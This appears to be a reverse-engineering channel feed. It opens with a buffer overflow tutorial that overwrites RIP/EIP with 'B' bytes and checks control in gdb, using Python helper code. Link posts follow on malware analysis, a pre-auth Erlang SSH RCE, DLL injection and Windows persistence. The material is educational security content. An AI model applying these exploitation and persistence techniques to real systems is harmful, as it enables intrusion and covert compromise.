Part 11: Buffer Overflow
Testing full control of RIP/EIP
We want to show the program that we can control RIP/EIP,
that is, make the register's value 0x42424242 (the hex for "BBBB").
If this step succeeds it means:
we are inside the brain of the program;
from here on we can decide the program's execution path ourselves.
Building the control-test input
Now we need to build an input that has:
112 arbitrary characters first, for example "A";
4 "B" characters in RIP's place.
Since "B" is 0x42 in ASCII, RIP should become 0x42424242.
A simple Python example:
from pwn import *  # pwntools; not actually needed for this step
import sys
offset = 112
payload = b"A" * offset
payload += b"B" * 8  # usually 8 bytes for 64-bit, 4 bytes for 32-bit
# print(payload) would emit the repr b'AAA...', not the raw bytes; write them directly
sys.stdout.buffer.write(payload)
Running the program with the control payload
We run the program:
./vuln $(python3 exploit.py)
or, if it reads its input from stdin:
python3 exploit.py | ./vuln
Checking that RIP is controlled
Inside gdb:
(gdb) run < <(python3 exploit.py)
(gdb) info registers
If everything is right you should see:
RIP: 0x4242424242424242
or in the 32-bit version:
EIP: 0x42424242
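As an added example (not code from the original post), the same marker test wrapped in checkable functions: build_payload() builds the "A" filler plus a register-wide run of "B", and control_check() reads rip/eip out of gdb `info registers` text to tell a fully controlled register from a partially overwritten one (offset slightly off) or an unrelated crash. The gdb sample lines are constructed for the example, not captured output.

```python
import re
import sys
from typing import Optional

MARKER = 0x42  # "B": the byte the test writes over the saved return address


def build_payload(offset: int, bits: int = 64) -> bytes:
    """Filler up to the saved return address, then a register-wide run of 'B'."""
    if bits not in (32, 64):
        raise ValueError("bits must be 32 or 64")
    return b"A" * offset + bytes([MARKER]) * (bits // 8)


def expected_value(bits: int = 64) -> int:
    """Value a fully controlled RIP/EIP shows: 0x4242424242424242 or 0x42424242."""
    return int.from_bytes(bytes([MARKER]) * (bits // 8), "little")


def read_pc(gdb_output: str, bits: int = 64) -> Optional[int]:
    """Pull rip (64-bit) or eip (32-bit) out of `info registers` text."""
    reg = "rip" if bits == 64 else "eip"
    m = re.search(rf"^{reg}\s+0x([0-9a-fA-F]+)", gdb_output, re.MULTILINE)
    return int(m.group(1), 16) if m else None


def control_check(gdb_output: str, bits: int = 64) -> str:
    """Classify the crash: 'controlled', 'partial' (some marker bytes, offset off), or 'none'."""
    pc = read_pc(gdb_output, bits)
    if pc is None:
        return "none"
    if pc == expected_value(bits):
        return "controlled"
    marker_bytes = sum(1 for b in pc.to_bytes(bits // 8, "little") if b == MARKER)
    return "partial" if marker_bytes else "none"


# Constructed samples of gdb `info registers` output (not real program output).
SAMPLE_64 = "rax            0x0                 0\nrip            0x4242424242424242  0x4242424242424242\n"
SAMPLE_32 = "eip            0x42424242          0x42424242\n"
SAMPLE_OFF = "rip            0x4242424242424141  0x4242424242424141\n"  # two filler bytes leaked in

if __name__ == "__main__":
    # Emit raw bytes so the payload can be piped or substituted into the target's input.
    sys.stdout.buffer.write(build_payload(112, 64))
```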
@reverseengine
Malware analysis of Sepsis ransomware:
https://www.reddit.com/r/MalwareAnalysis/comments/bgf71t/malware_analysis_of_sepsis_ransomware/
Analysis of malware attacked bank X customers:
https://www.reddit.com/r/MalwareAnalysis/comments/bgqz7m/analysis_of_malware_attacked_bank_x_customers/
Unpacking UPX manually:
https://www.reddit.com/user/Thatskriptkid/comments/c3csyd/unpacking_upx_manually/
Analysis of simple obfuscated office malware:
https://www.reddit.com/r/MalwareAnalysis/comments/bxvw1j/analysis_of_simple_obfuscated_office_malware/
@reverseengine
Introducing Lumen Server Protocol
https://abda.nl/posts/introducing-lumen/
A private Lumina server for IDA Pro
https://github.com/naim94a/lumen
Investigating IDA Lumina Feature
https://www.synacktiv.com/en/publications/investigating-ida-lumina-feature.html
Local server for IDA Lumina feature
https://github.com/synacktiv/lumina_server
@reverseengine
Forwarded from GO-TO CVE
CVE-2025-32433-week-79.pdf
219.4 KB
🎯 Week 79 — CVE‑2025‑32433 — Erlang/OTP SSH — Pre‑Auth RCE
🔹 CVE: CVE‑2025‑32433
🔹 Type: Remote Code Execution (pre‑authentication flaw in Erlang/OTP SSH server)
🔹 Impact: Full system compromise via crafted SSH messages — no credentials required
🔹 Fixed in: OTP‑27.3.3 / OTP‑26.2.5.11 / OTP‑25.3.2.20
🔹 Action: Patch immediately or disable SSH / restrict access by firewall
Exploit
#week_79
Injection DLLs into the explorer process using icons
https://github.com/d419h/IconJector
@reverseengine
Forwarded from DarkBit
New Persistence Method In Windows.pdf
1.8 MB
🔒 A new persistence technique in Windows!
📌 Article summary:
In this section we introduce a persistence technique in Windows implemented through DLL injection and replacement with user-level access. In this method the malicious DLL is executed by the svchost.exe process, giving continuous and covert code execution on the target system.
#RedTeam #CyberSecurity
#Maldev #Persistence
#WindowsInternals
💬 Forum
📣 DarkBit
Exploit Development: Investigating Kernel Mode Shadow Stacks on Windows
https://connormcgarr.github.io/km-shadow-stacks
@reverseengine
Analysing a 1-day Vulnerability in the Linux Kernel's TLS Subsystem
https://faith2dxy.xyz/2025-10-02/kCTF-TLS-nday-analysis
@reverseengine
Rowhammer Attacks on DDR5
https://thehackernews.com/2025/09/phoenix-rowhammer-attack-bypasses.html
https://youtu.be/1emxVQ6__qg
@reverseengine
Ghidra Scripts/Plugins/Extension
https://github.com/AllsafeCyberSecurity/awesome-ghidra
@reverseengine
A Universal MCU Firmware Emulator for Dynamic Analysis without Any Hardware Dependence
https://github.com/MCUSec/uEmu
@reverseengine
VMProtect 2 - Detailed Analysis of the Virtual Machine Architecture
https://back.engineering/17/05/2021/
@reverseengine